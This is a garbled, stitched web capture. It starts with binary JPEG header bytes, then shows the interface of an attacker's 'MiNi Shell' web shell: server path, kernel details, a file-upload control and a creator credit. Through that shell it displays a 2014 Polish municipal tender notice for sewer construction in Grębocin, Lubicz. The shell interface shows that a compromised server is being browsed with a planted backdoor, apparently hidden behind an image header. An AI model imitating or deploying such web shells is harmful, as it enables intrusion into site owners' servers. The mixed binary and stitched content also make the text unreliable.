JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140317/88874-N-2014.html

<p class="kh_header"><b>Lubicz: Budowa kanalizacji sanitarnej wraz z sięgaczami, czteroma  przepompowniami sieciowymi  i dziesięcioma  przydomowymi II etap realizowany w m. Grębocin  Gm.Lubicz</b><br>
<b>Numer ogłoszenia: 88874 - 2014; data zamieszczenia: 17.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubicz , Lubicz Dolny, ul. Toruńska 21, 87-162 Lubicz, woj. kujawsko-pomorskie, tel. +48566212100, faks +48566782122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej wraz z sięgaczami, czteroma  przepompowniami sieciowymi  i dziesięcioma  przydomowymi II etap realizowany w m. Grębocin  Gm.Lubicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólna charakterystyka robót;

I Projektuje się, że ścieki ze wsi Grębocin dla wszystkich etapów systemem grawitacyjno ciśnieniowym  będą sprowadzane do przepompowni głównej usytuowanej nieopodal zbiegu dróg krajowej i wojewódzkiej oraz krzyżującej się z nimi z Strugi Toruńskiej. Z przepompowni głównej PG1 ścieki będą  odprowadzane rurociągami  tłocznymi  do systemu kanalizacji sanitarnej w ul. Olsztyńskiej w Toruniu, którym będą odprowadzane na miejską oczyszczalnie ścieków w Toruniu.
Kanalizacja sanitarna II etapu obejmuje rejon ulic; Dworcowa,Owocow,Księżycowa,Morelowa,Lampkowskiego,Zorzy,Słoneczna,Poranna,Okrężna,Nowa,Zielna

Zakres robót II etapu to;

1.kanalizacja sanitarna grawitacyjna studzienki fi 315mm do sięgaczy 163 szt
sięgacze z rur PVC 160 L 266,00m

kanał z rur PVC 250 L 824,00 m
kanał z rur pcv 200 L3001,00 m

Razem L 3825,00m
2.sięgacze kanalizacyjne do działek zabudowanych
ilość sięgaczy 128szt
sięgacze z rur PVC 200 L 149,00m
sięgacze z rur PVC 160 L 1.005,50m
Razem L 1154,50m
3.sięgacze kanalizacyjne  do działek niezabudowanych
ilość sięgaczy 40 szt
sięgacze z rur PVC 200 L 00,00m
sięgacze z rur PVC 160 L 266,00m
Razem L 266,00
4. studnie  kanalizacyjne 
studnie betonowe fi 1200mm 94 szt
studzienki fi 315mm do sięgaczy 163szt
studzienki fi 425mm dla kanałów PVC 250 22 szt
studzienki fi 425mm dla kanałów PVC 200 90 szt
Razem 369,00szt
5.Rurociągi tłoczne
rurociąg  z rur PE 90 L 643,5
rurociąg  z rur PE 63 L 711,5
Razem 1355,00m 

6.Przepompownie ścieków ;
przepompownie  sieciowe 4szt
przepompownie  przydomowe 10szt
Razem 14szt
7. Kanalizacja deszczowa 
kanał z rur PVC 250 L 6,00m
studzienka osadnikowa fi 425mmbez syfonu 1szt
wpust deszczowy żeliwny uliczny D400 1szt
II. Przepompownie sieciowe PS-6 oraz PS-7 wraz z ich ogrodzeniem,zasilaniem w energię  elektryczną  z przyłącza wykonanego przez dostawcę energii,oraz utwardzeniem podjazdu do przepompowni i terenu w granicach ogrodzenia na terenie ogrodzonym przepompowni projektuje się wykonanie ;
zbiornika przepompowni z pełnym wyposażeniem
słupowej lampy oświetleniowej 
rurociągów i kanałów ściekowych
kabli energetycznych i sterowniczych oraz szafki sterowniczej
utwardzenia terenu
III. Dwie przepompownie sieciowe w wykonaniu przejazdowym zlokalizowane  w pasie dróg oznaczone jako PS10 i PS11 wraz z szafkami  sterowniczymi i kablami zasilającymi  je w energię elektryczną 
dziesięć przepompowni przydomowych PD1 do PD6 oraz PD18 do PD21
IV .Kanały
Całkowita długość kanałów i rurociągów 1 tłocznych i sięgaczy wynosi 6601,0m W sumie do wykonania jest 14 przepompowni  w tym czterech sieciowych i dziesięciu przydomowych oraz wykonanie kanału deszczowego długości 6,0m.
Część kanałów usytuowana jest w pasie drogi wojewódzkiej nr 552 oraz drogi krajowej nr 15 na terenie którego właściwym organem  do wydania pozwolenia na budowę był Wojewoda
Obejmuje następujące odcinki kanalizacji;
kanały grawitacyjne PVC250 201,7m PVC200 62,2m
W sumie 263,9m
rurociągi tłoczne PE 90 13,4m PE63 14,5m
W sumie 27,9m sięgacze kanalizacji grawitacyjnej fragmenty
Łączna długość sięgaczy;PVC 160 49,6m
Kanał deszczowy PVC 2506.0m
Łączna długość  kanałów i rurociągó2)w tłocznych i sięgaczy oraz kanału deszczowego we właściwości Wojewody to 347,4m
Natomiast Starosta  jest organem właściwym dla wydania  pozwolenia na realizację kanałów  usytuowanych  poza pasami drogi wojewódzkiej nr 552 oraz drogi krajowej nr 15 o łącznej długości kanałów i rurociągów  tłocznych,sięgaczy 6.253,6m oraz wszystkich przepompowni ścieków 14 szt objętych do wykonania w tym zakresie.  
Szczegółowe rozwiązania  zawiera dokumentacja pn  Projekt budowlany Kanalizacja sanitarna  dla m. Grębocin gmina Lubicz etap-II
Wykonany przez Przedsiębiorstwo Inżynierii Środowiska BSB sp.j
65 014 Zielona Góra ul. Jana z Kolna 4
W zakresie Wykonawcy jest wykonanie inwentaryzacji  zrealizowanego zakresu robót bez dodatkowego wynagrodzenia .
Zamawiający zaleca zbadanie przydatności gruntu rodzimego  do wykorzystania jako  zasypkę wykopu aby  uzyskać parametry zagęszczenia gruntu wymagane w PB i ST
Zamawiający  zaznacza, że jeżeli zajdzie konieczność wymiany gruntu ,wykonawca  powinien  uwzględnić ten koszt w cenie  oferty. 
Nie przewidujemy zapłaty za wymianę gruntu.
Dokumenty: Inwestor uzyskał
pozwolenie na budowę  Nr AB.6740.4.183.2011.KM  z dnia 24.12.2013r z klauzulą ostateczności z 03.11.2011r.
pozwolenie wodno-prawne OS.6341.32.2011.KK  z dnia 8.07.2011  z klauzulą prawomocności 10.08.2011r 
uzgodnienia z drogami wojewódzkimi i powiatowymi
 Uwaga
Roboty odtworzeniowe;
Cena wykonania robót odtworzeniowych obejmuje;
Prace pomiarowe
Roboty przygotowawcze.
Przygotowanie,dostawę i wbudowanie materiałów,
Przeprowadzenie pomiarów i badań laboratoryjnych.
Przepisy związane.
1 ustawa  z dnia 7 lipca 1994r-Prawo Budowlane Dz.U.2003nr 207,poz 2016 z póżn. zmianami
2 ustawa z dnia  21 marca 1985r. o drogach publicznych Dz.U z 2004, Nr 204,poz 2086 z póżn. zmianami
3 ustawa z dnia 20 czerwca 1997r Prawo o ruchu drogowym /Dz.U z 2005r, Nr 108 poz.908 z póżn. zmianami
4 Rozporządzenie Ministra Infrastruktury z dnia 28 września 2003r w sprawie szczególnych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem Dz.U z 2003r Nr 177, poz 1729
5 Rozporządzenie  Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie Dz.U. z 1999r Nr 43,poz 430 z póżn. .zmianami
6 Rozporządzenie Ministra Infrastruktury z dnia 6 lutego 2003r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych Dz.U. z 2003r Nr 47,poz 401
7 Rozporządzenia Ministra Pracy Polityki Socjalnej z dnia 26 września 1997r . w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy Dz.U. z  2003r,Nr 169,poz1650
PN EN 13043 2004 Kruszywa do mieszanek bitumicznych i powierzchniowych utwardzeń stosowanych na drogach, lotniskach i innych powierzchniach przeznaczonych do ruchu.
PN S 0205 1998 drogi samochodowe .Roboty ziemne. Wymagania i badania .
PN 87 S 0201 drogi samochodowe. Nawierzchnie drogowe. Podział , nazwy. określenia 
PN EN 2061 2003 Beton Cz. Wymagania właściwości,  produkcja i zgodność,
PN 58 S 96026  Drogi samochodowe .Nawierzchnie z kostki kamiennej nieregularnej.
PN S 96025 2000 drogi samochodowe i lotniskowe Nawierzchnia asfaltowa Wymagania
PN 84 S 96023 Konstrukcje drogowe.Podbudowa i nawierzchnia z tłucznia kamiennego.
Uwaga:
Jeżeli gdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie urządzeń i materiałów, to Zamawiający dopuszcza możliwość zastosowania materiałów i urządzeń równoważnych w stosunku do  zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych i jakościowych. Przez pojęcie urządzeń i materiałów równoważnych należy rozumieć urządzenia i materiały gwarantujące realizację robót zgodnie z wydanym  pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Zamawiający wymagać będzie od Wykonawcy, którego oferta zostanie wybrana, wykonania przedmiotu zamówienia zgodnie z opracowanym projektem, szczególnie w zakresie niezawodności działania. Wykonawca musi mieć świadomość, iż możliwość zastosowania urządzeń równoważnych uzależniona będzie od ich zgodności ze wszystkimi parametrami określonymi w projekcie, specyfikacji technicznej oraz akceptacji inspektora nadzoru  projektanta..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień dodatkowych  zgodnie z art. 67 ust 1.pkt 5. w przypadku udzielenia dotychczasowemu wykonawcy usług lub robót budowlanych zamówień dodatkowych, nie objętych zamówieniem podstawowym  i nie przekraczającym łącznie  50% wartości  realizowanego , niezbędnych  do jego prawidłowego wykonania , których wykonanie  stało się konieczne  na skutek  sytuacji niemożliwej  wcześniej do przewidzenia ,jeżeli;
a. z przyczyn  technicznych lub gospodarczych oddzielenie  zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów lub
b. wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.11.20-0, 45.23.10.00-5, 45.23.24.23-3, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia WADIUM  na podstawie art. 45 Pzp w wysokości 100.000,00 zł, wniesione w formie zgodnie z art. 45 pkt 6 Pzp w terminie złożenia oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania w szczególności koncesji, zezwolenia lub licencji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku wspólnego ubiegania się dwóch i więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje).
Warunek zostanie uznany za spełniony, jeżeli wykonawca  wykaże, że: .wykonał 
1. co najmniej  jedną sieć kanalizacji sanitarnej grawitacyjnej , o długości  nie mniejszej niż 4000,00m  inwestycje o podobnej złożoności i charakterze.
2.co najmniej jedną sieć kanalizacji tłocznej  o łącznej długości  nie mniej niż 1000,00m
3. co najmniej czterech przepompowni sieciowych
4. minimum  10 przepompowni przydomowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Warunek zostanie uznany za spełniony, jeżeli wykonawca  wykaże, że: 
1)  osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj. posiadają uprawnienia budowlane jn.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubicz, ul. Toruńska 21, 87-162 Lubicz Referat Promocji i Rozwoju pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2014 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego pokój 9 biuro podawcze,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane w ramach  środków PROW- w ramach działania 321 podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com